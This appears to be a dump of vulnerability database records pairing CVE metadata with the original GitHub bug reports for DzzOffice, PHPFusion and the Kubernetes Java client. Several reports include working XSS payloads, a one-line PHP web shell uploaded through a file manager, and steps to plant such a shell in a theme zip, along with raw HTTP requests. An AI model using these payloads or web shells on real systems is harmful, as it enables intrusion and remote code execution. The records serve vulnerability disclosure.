[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/196" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/zyx0814/dzzoffice/issues/196" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:dzzoffice:dzzoffice:2.02.1:*:*:*:*:*:*:*", "matchCriteriaId": "0ECA901D-850D-468C-B516-01F29417313D", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/zyx0814/dzzoffice/issues/196
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "zyx0814", "dzzoffice" ]
#Author: KietNA from 1nv1cta team, HPT CyberSecurity Center #Email: kietnguyenanh9320@gmail.com #Submit date: 28/08/2021 #Target: http://www.dzzoffice.com/ #Version: 2.02.1 (https://github.com/zyx0814/dzzoffice/releases/tag/2.02.1) # Description: Because of lacking of sanitizer of input data at all of upload functions in `webroot/dzz/attach/Uploader.class.php` and return wrong response content-type of output data in `webroot/dzz/attach/controller.php`, The Authenticated user (not an admin) can injection malicious code into `fileName` and craft a specific html file, then user click on that file the script will be executed. # To Reproduce Steps to reproduce the behavior: 1. Go to any textarea form and use upload function 2. Inject malicious script into fileName like ``<img src=x onerror=alert(1);`` 3. Craft an specific html file to send request to server in webclient, when user click on that file malicious script will be executed ### Request ``` POST /index.php?mod=attach&op=controller&action=uploadfile&encode=utf-8 HTTP/1.1 Host: 172.16.0.12:4444 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate X_Requested_With: XMLHttpRequest Content-Type: multipart/form-data; boundary=---------------------------217491654215499331073774419025 Content-Length: 893 Origin: http://172.16.0.12:4444 Connection: close -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="id" WU_FILE_0 -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="name" <img src=x onerror=alert(1);>.jpg -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="type" image/jpeg -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="lastModifiedDate" 8/28/2021, 10:51:39 -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="size" 24041 -----------------------------217491654215499331073774419025 Content-Disposition: form-data; name="upfile"; filename="<img src=x onerror=alert(1);>kietna.jpg" Content-Type: image/jpeg 1111 -----------------------------217491654215499331073774419025-- ``` ###IMAGE ![image](https://user-images.githubusercontent.com/54875703/131205879-7b7080d9-1a78-4c64-a7b2-877a869315e8.png) ![image](https://user-images.githubusercontent.com/54875703/131205882-3cbac43a-ce85-4105-96bd-378bc8b18756.png) ![image](https://user-images.githubusercontent.com/54875703/131205889-4b86c2c2-efb9-4501-99a2-010a01f71d6f.png) ![image](https://user-images.githubusercontent.com/54875703/131205893-eaa03c30-136b-4e6b-9873-2ba234992ea2.png) ### Response ``` HTTP/1.1 200 OK Date: Sat, 28 Aug 2021 03:58:15 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 X-Powered-By: PHP/7.3.29 Set-Cookie: ORRL_2132_saltkey=DgE37EkI; expires=Mon, 27-Sep-2021 03:58:15 GMT; Max-Age=2592000; path=/; HttpOnly Set-Cookie: ORRL_2132_lastvisit=1630119495; expires=Mon, 27-Sep-2021 03:58:15 GMT; Max-Age=2592000; path=/ Set-Cookie: ORRL_2132_sid=GvNq0a; expires=Sun, 29-Aug-2021 03:58:15 GMT; Max-Age=86400; path=/ Set-Cookie: ORRL_2132_lastact=1630123095%09index.php%09attach; expires=Sun, 29-Aug-2021 03:58:15 GMT; Max-Age=86400; path=/ Content-Length: 1009 Connection: close Content-Type: text/html; charset=utf-8 {"state":"SUCCESS","url":"index.php?mod=io&op=thumbnail&width=0&height=0&original=1&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","title":"<img src=x onerror=alert(1);>kietna.jpg","original":"<img src=x onerror=alert(1);>kietna.jpg","type":".jpg","size":4,"attach":{"aid":"2","filename":"<img src=x onerror=alert(1);>kietna.jpg","filetype":"jpg","filesize":"4 B ","attachment":"dzz\/202108\/28\/115309kip2jipijtji4nq6.jpg","remote":"0","copys":"0","md5":"b59c67bf196a4758191e42f76670ceba","thumb":"0","dateline":"1630122789","unrun":"0","url":"index.php?mod=io&op=thumbnail&width=0&height=0&original=1&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","img":"index.php?mod=io&op=thumbnail&width=256&height=256&original=0&path=MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","isimage":1,"apath":"MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M","dpath":"MXRyUU8zN0RGMXlTTFVUUmI4MkZRWFNaU2k1UXFxNnJ4STVUYnJTSjFTcjFrb3M"}} ```
Lacking of sanitizer fileName lead to Cross-site Scripting in Upload function
https://api.github.com/repos/zyx0814/dzzoffice/issues/196/comments
1
2021-08-28T04:19:09Z
2021-08-28T04:34:28Z
https://github.com/zyx0814/dzzoffice/issues/196
981,723,190
196
2,684
CVE-2021-40541
2021-10-11T14:15:07.647
PHPFusion 9.03.110 is affected by cross-site scripting (XSS) in the preg patterns filter html tag without "//" in descript() function An authenticated user can trigger XSS by appending "//" in the end of text.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "NONE", "baseScore": 4.3, "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0" }, "exploitabilityScore": 8.6, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": true } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.1, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "CHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 2.7, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2373" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2373" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*", "matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "79" ]
79
https://github.com/PHPFusion/PHPFusion/issues/2373
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PHPFusion", "PHPFusion" ]
#KietNA From Inv1cta Team, HPT Cyber Security Center Sorry for bad english **Describe the bug** preg patterns filter html tag without "//" in descript() function, the authenticated user can trigger xss by append "//" in the end of text **Version** PHPFusion version: PHPFusion 9.03.110 **To Reproduce** Steps to reproduce the behavior: 1. Go to any textarea form 2. Add "<svg onload=alert(1)//" in textarea form and submit 3. When authenticated user or admin use preview html function the malicious script will be executed, even the attacker can store malicious script when admin publish submission **Screenshots** preg pattern filter html tag without "//" in the end of html ![image](https://user-images.githubusercontent.com/54875703/130721129-2733e560-3302-442c-8fd8-ec59557a0b82.png) User preview and submit submission ![image](https://user-images.githubusercontent.com/54875703/130721382-74cc71f0-ec15-4fcd-8f15-ab7601d92454.png) Admin preview submission of user ![image](https://user-images.githubusercontent.com/54875703/130721482-76e7ad4f-af1e-4803-b8c1-6aa720aae9b2.png) Admin publish submission and the attacker can store malicious script ![image](https://user-images.githubusercontent.com/54875703/130721666-01b34534-4473-482e-9f48-94e02e537793.png) The Attacker can store malicious script in forum without admin browsing the post by post new thread function ![image](https://user-images.githubusercontent.com/54875703/130756240-75303e95-cb6c-43d7-b262-10655e868efd.png) When admin click on Activity button, the script of user kietna will be executed ![image](https://user-images.githubusercontent.com/54875703/130756310-9d78c698-df24-494b-bf5c-62db8694e682.png) **Additional context** ###REQUEST: ``` POST /submit.php?stype=a HTTP/1.1 Host: 172.16.0.12:5554 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 395 Origin: http://172.16.0.12:5554 Connection: close Referer: http://172.16.0.12:5554/submit.php?stype=a Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_lastvisit=1629852584; fusionc4q8w_user=2.1630031855.2d2e26d63d89a73447202a9978b3ff81a084dae1acbddeeb4c6fd5de86f85469 Upgrade-Insecure-Requests: 1 fusion_token=2-1629861818-8b90d545094236c6cc3daa34012b16531afc70a7d12df00e8dba976f92f37e84&form_id=submissionform&fusion_wKs75X=&article_subject=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_keywords=&article_cat=1&article_language%5B%5D=English&article_snippet=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&article_article=%22%3E%3Csvg+onload%3Dalert%281%29%3B%2F%2F&preview_article=Preview ``` ###RESPONSE: ``` HTTP/1.1 200 OK Date: Wed, 25 Aug 2021 03:25:24 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 X-Powered-By: PHPFusion 9.03.110 Last-Modified: Wed, 25 Aug 2021 03:25:25 GMT Cache-Control: no-cache X-Content-Type-Options: nosniff Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68868 ```
Bypass preg pattern lead to Cross-site Scripting in descript() function
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2373/comments
3
2021-08-25T03:33:12Z
2021-09-01T11:22:54Z
https://github.com/PHPFusion/PHPFusion/issues/2373
978,672,135
2,373
2,685
CVE-2021-25738
2021-10-11T19:15:07.487
Loading specially-crafted yaml with the Kubernetes Java Client library can lead to code execution.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 4.6, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 3.9, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 6.7, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 0.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/23/2" }, { "source": "jordan@liggitt.net", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes-client/java/issues/1698" }, { "source": "jordan@liggitt.net", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "http://www.openwall.com/lists/oss-security/2022/08/23/2" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/kubernetes-client/java/issues/1698" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Mailing List", "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/K_pOK2WbAJk" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*", "matchCriteriaId": "697973C0-82C4-45DD-9240-7722F8C2F229", "versionEndExcluding": null, "versionEndIncluding": "9.0.2", "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*", "matchCriteriaId": "E8C9C6D5-285E-411A-BE51-E46CBF69A58C", "versionEndExcluding": null, "versionEndIncluding": "10.0.1", "versionStartExcluding": null, "versionStartIncluding": "10.0.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:java:*:*:*:*:*:*:*:*", "matchCriteriaId": "D50DD1C8-E23A-4C05-AA26-CB9FB9C8538B", "versionEndExcluding": "11.0.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "11.0.0", "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "502" ]
502
https://github.com/kubernetes-client/java/issues/1698
[ "Issue Tracking", "Third Party Advisory" ]
github.com
[ "kubernetes-client", "java" ]
A security issue was discovered in the Kubernetes Java client library where loading specially-crafted yaml can lead to code execution. This issue has been rated Medium ([CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H)), and assigned CVE-2021-25738. ### Am I vulnerable? If you process untrusted inputs with the [Kubernetes Java Client](https://github.com/kubernetes-client/java) you may be vulnerable to this issue. #### Affected Versions * Kubernetes Java Client == v12.0.0 * Kubernetes Java Client &lt;= v11.0.1 * Kubernetes Java Client &lt;= v10.0.1 * Kubernetes Java Client &lt;= v9.0.2 ### How do I mitigate this vulnerability? Prior to upgrading, this vulnerability can be mitigated by validating inputs to the client. #### Fixed Versions * Kubernetes Java Client _master_ - Patched by https://github.com/kubernetes-client/java/pull/1676 * Kubernetes Java Client >= v12.0.1 - Patched by https://github.com/kubernetes-client/java/pull/1691 * Kubernetes Java Client >= v11.0.2 - Patched by https://github.com/kubernetes-client/java/pull/1692 ### Detection If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Jordy Versmissen through our [bug bounty](https://hackerone.com/kubernetes).
CVE-2021-25738: Code exec via yaml parsing
https://api.github.com/repos/kubernetes-client/java/issues/1698/comments
0
2021-05-10T18:42:48Z
2021-05-17T21:01:16Z
https://github.com/kubernetes-client/java/issues/1698
884,853,002
1,698
2,686
CVE-2021-40188
2021-10-11T19:15:07.547
PHPFusion 9.03.110 is affected by an arbitrary file upload vulnerability. The File Manager function in admin panel does not filter all PHP extensions such as ".php, .php7, .phtml, .php5, ...". An attacker can upload a malicious file and execute code on the server.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2372" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2372" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*", "matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/PHPFusion/PHPFusion/issues/2372
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PHPFusion", "PHPFusion" ]
#By KietNA From Inv1cta team, HPT Cyber Security Center **Describe the bug** File Manager function in admin panel does not filter all of php extensions like ".php, .php7, .phtml, .php5, ...", The attacker can upload malicious file and execute code in server **Version** PHPFusion version: PHPFusion 9.03.110 **To Reproduce** Steps to reproduce the behavior: 1. Go to administrator panel and click on FileManager function 2. Click on Upload file button, then choose .php file 3. The path of file will return in response 4. Finally, access and execute code on server **Screenshots** ![image](https://user-images.githubusercontent.com/54875703/130697945-e462891a-175b-461e-8dea-6ad00df8e644.png) Request and response of function ![image](https://user-images.githubusercontent.com/54875703/130698038-2c82a193-24b6-4a46-9aa6-9ea874846b9c.png) Execute code on server: ![image](https://user-images.githubusercontent.com/54875703/130698099-0e37c825-4940-418b-815a-3b044a0faae2.png) **Additional context** Although PHPFusion have 2 step verification for administrator panel, but if cookie of admin users were stolen, the attacker can POST request upload file with that cookie and execute code on server ###REQUEST: ``` POST /includes/elFinder/php/connector.php?aid=e5c19545a88a5d4d HTTP/1.1 Host: 172.16.0.12:5554 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:90.0) Gecko/20100101 Firefox/90.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=---------------------------3950035332713980620819721882 Content-Length: 706 Origin: http://172.16.0.12:5554 Connection: close Referer: http://172.16.0.12:5554/administration/file_manager.php?aid=e5c19545a88a5d4d Cookie: PHPSESSID=qhclrgdoah7rbv9l34fvj07h00; fusiony1dli_session=jjfp12qmql4s64caf8ob6eld2t; fusiony1dli_visited=yes; usertbl_results=user_joined%2Cuser_lastvisit%2Cuser_groups; usertbl_status=0; fusiony1dli_lastvisit=1629684275; fusiony1dli_user=1.1630015266.b9cf1c8d19231964f87b60503eb37b6cd23047438f61fe3b750f0d371a242ec6; fusiony1dli_admin=1.1630015307.2c32968c83f8c4c0224d5a0d4a0de496d62b98325c2754a38c3451087161671e; fusionc4q8w_lastvisit=1629839491; fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; fusionc4q8w_visited=yes; fusionc4q8w_user=1.1630015933.97acae239cf33f2741f9b3537eb071fcd6b9e8c560188e44b734cda6c4957cdd; fusionc4q8w_admin=1.1630015939.a2f2f7349b5f7f589227e2cba22a9361986acb754ff4468e1a3a48fad223c176 -----------------------------3950035332713980620819721882 Content-Disposition: form-data; name="reqid" 17b7a38fbae2eb -----------------------------3950035332713980620819721882 Content-Disposition: form-data; name="cmd" upload -----------------------------3950035332713980620819721882 Content-Disposition: form-data; name="target" l1_Lw -----------------------------3950035332713980620819721882 Content-Disposition: form-data; name="upload[]"; filename="3.php" Content-Type: text/php <?=`$_GET[0]`?> -----------------------------3950035332713980620819721882 Content-Disposition: form-data; name="mtime[]" 1625501319 -----------------------------3950035332713980620819721882-- ``` ###RESPONSE: ``` HTTP/1.1 200 OK Date: Tue, 24 Aug 2021 22:23:36 GMT Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1k PHP/7.3.29 X-Powered-By: PHPFusion 9.03.110 Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Set-Cookie: fusionc4q8w_session=j0gfm3ht612b5ktr55h9n2o1te; expires=Thu, 26-Aug-2021 22:23:36 GMT; Max-Age=172800; path=/ Content-Length: 1090 X-Content-Type-Options: nosniff Connection: close Content-Type: application/json; charset=utf-8 {"added":[{"isowner":false,"ts":1629843816,"mime":"text\/x-php","read":1,"write":1,"size":"16","hash":"l1_My5waHA","name":"3.php","phash":"l1_Lw","url":"http:\/\/172.16.0.12:5554\/images\/3.php"}],"removed":["l1_My5waHA"],"changed":[{"isowner":false,"ts":1614754682,"mime":"directory","read":1,"write":1,"size":0,"hash":"l1_Lw","name":"root_images","rootRev":"","options":{"path":"","url":"","tmbUrl":"","disabled":[],"separator":"\\","copyOverwrite":1,"uploadOverwrite":1,"uploadMaxSize":9223372036854775807,"uploadMaxConn":3,"uploadMime":{"firstOrder":"deny","allow":[],"deny":[]},"dispInlineRegex":"^(?:(?:video|audio)|image\/(?!.+\\+xml)|application\/(?:ogg|x-mpegURL|dash\\+xml)|(?:text\/plain|application\/pdf)$)","jpgQuality":100,"archivers":{"create":["application\/zip"],"extract":["application\/zip"],"createext":{"application\/zip":"zip"}},"uiCmdMap":[],"syncChkAsTs":1,"syncMinMs":0,"i18nFolderName":0,"tmbCrop":1,"tmbReqCustomData":false,"substituteImg":true,"onetimeUrl":true,"csscls":"elfinder-navbar-root-local"},"volumeid":"l1_","locked":1,"dirs":1,"isroot":1,"phash":""}]} ```
File Manager does not filter php extension lead to Upload malicious files
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2372/comments
3
2021-08-24T22:29:42Z
2021-08-25T14:18:30Z
https://github.com/PHPFusion/PHPFusion/issues/2372
978,534,506
2,372
2,687
CVE-2021-40189
2021-10-11T19:15:07.587
PHPFusion 9.03.110 is affected by a remote code execution vulnerability. The theme function will extract a file to "webroot/themes/{Theme Folder], where an attacker can access and execute arbitrary code.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "PARTIAL", "baseScore": 6.5, "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "version": "2.0" }, "exploitabilityScore": 8, "impactScore": 6.4, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.2, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "HIGH", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 1.2, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2374" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/PHPFusion/PHPFusion/issues/2374" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:php-fusion:phpfusion:9.03.110:*:*:*:*:*:*:*", "matchCriteriaId": "29149A91-66BD-4C42-9D94-7EE9044F1727", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "434" ]
434
https://github.com/PHPFusion/PHPFusion/issues/2374
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "PHPFusion", "PHPFusion" ]
#KietNA From Inv1cta Team, HPT Cyber Security Center **Describe the bug** The attacker can abuse upload theme function to insert malicious php code or php file into zip file and upload to server, then the function will extract that file to "webroot/themes/[Theme Folder], the attacker can access and execute arbitrary code **Version** PHPFusion version: PHPFusion 9.03.110 **To Reproduce** Steps to reproduce the behavior: 1. Add " <?=`$_GET[0]`?>" in line one php file of plugin or create a php file in any folder then zip it (i create kietna.php file in forum folder) 1. Go to Theme Manager function in admin panel 2. Click on Upload New Theme tab 3. Upload malicious zip file 4. Access "/themes/[Plugin Folder]/theme.php?0=ls" or "/themes/[Plugin Folder]/forum/kietna.php?0=ls" to execute arbitrary code **Screenshots** ![image](https://user-images.githubusercontent.com/54875703/130911054-1019dfc1-aaef-4332-993b-21ea7787d9a2.png) ![image](https://user-images.githubusercontent.com/54875703/130911100-e72a476c-7c37-45b3-a5cf-796023abde53.png) The function extracted malicious zip file: ![image](https://user-images.githubusercontent.com/54875703/130911161-d5862fdc-ea0e-45e3-a5b1-68dca7f7cf74.png) Execute code: ![image](https://user-images.githubusercontent.com/54875703/130911185-a4b6ce5d-4146-4e91-b585-de234a9fdbe1.png) **Additional context** It is look like CVE-2019-11631: https://www.exploit-db.com/exploits/46775
PHP Code Execution Via Inject Malicious Code Or Create New Php File In Zip Theme
https://api.github.com/repos/PHPFusion/PHPFusion/issues/2374/comments
4
2021-08-26T06:20:18Z
2021-08-27T08:12:12Z
https://github.com/PHPFusion/PHPFusion/issues/2374
979,878,754
2,374
2,688
CVE-2021-40239
2021-10-11T19:15:07.627
A Buffer Overflow vulnerability exists in the latest version of Miniftpd in the do_retr function in ftpproto.c
